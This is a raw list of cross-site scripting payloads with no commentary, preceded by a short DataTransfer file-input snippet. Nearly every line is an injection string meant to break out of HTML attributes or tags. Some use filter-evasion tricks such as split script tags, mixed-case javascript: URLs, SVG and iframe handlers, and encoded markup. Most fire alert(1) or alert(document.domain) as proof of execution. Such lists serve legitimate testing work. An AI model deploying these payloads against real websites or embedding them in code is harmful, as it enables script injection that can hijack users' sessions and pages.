<input type="file" id="fileInput" /><script>const fileInput = document.getElementById('fileInput');const dataTransfer = new DataTransfer();const file = new File(['Hello world!'], 'hello.txt', {type: 'text/plain'});dataTransfer.items.add(file);fileInput.files = dataTransfer.files</script>

batman%22%3E%3C/form%3E%3Cdiv%20class=%22inner%20product-tab%22%3E%3Ch3%3E%3CjAvAsCrIpT:%20onclick=location=tagName%2BinnerHTML%2Blocation.hash%3E/*click%20me!#*/alert(document.domain) 
"><img src=x onerror=alert(1)>
"><input autofocus onfocus=alert(1)>
url":"javascript://test%0aalert(document.domain)
"><img src='x' onerror=alert(1)>
"><<h1>img src=1 onerror=alert(1)>
<<h>/title><h>img src=1 onerror=alert(1)>
</scrip</script>t>"><img src=x onerror=alert(1)>
</scrip</script>t>"><img src =x onerror=alert(1)>
<style/><img src="z'z</style><script/z>alert(1)</script>">

"><svg onload=alert(1)>
"><svg/onload=alert(1)>
</scrip</script>t>"><svg onload=alert(1)>
</scrip</script>t>">"><svg/onload=alert(1)>
"><iframe/src=javascript%26colon;[document.domain].find(alert)>
<svg><title><title><image href="</title><iframe onload=alert(1)>" /></title></title></svg>
